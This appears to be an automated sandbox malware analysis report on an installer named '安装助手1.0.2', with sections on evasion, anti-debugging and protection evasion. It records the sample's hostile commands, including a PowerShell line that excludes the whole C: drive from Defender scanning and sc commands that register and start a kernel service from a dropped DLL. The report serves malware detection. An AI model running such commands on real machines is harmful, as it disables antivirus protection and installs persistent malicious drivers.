Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6125Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3578Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpWindow / User API: threadDelayed 610Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpWindow / User API: threadDelayed 667Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpWindow / User API: threadDelayed 582Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-EIO1L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC3AEC0 FindFirstFileA,FindClose,FindClose,6_2_6CC3AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E96868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00E96868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E97496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00E97496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E99C60 GetSystemInfo,10_2_00E99C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000002.2156449096.0000000000D88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CAC3886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6CAC3886
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC50181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CC50181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00F157D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00F157D0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC59D66 mov eax, dword ptr fs:[00000030h]6_2_6CC59D66
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC59D35 mov eax, dword ptr fs:[00000030h]6_2_6CC59D35
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC4F17D mov eax, dword ptr fs:[00000030h]6_2_6CC4F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC48CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CC48CBD
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC50181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CC50181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CD17700 cpuid 6_2_6CD17700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
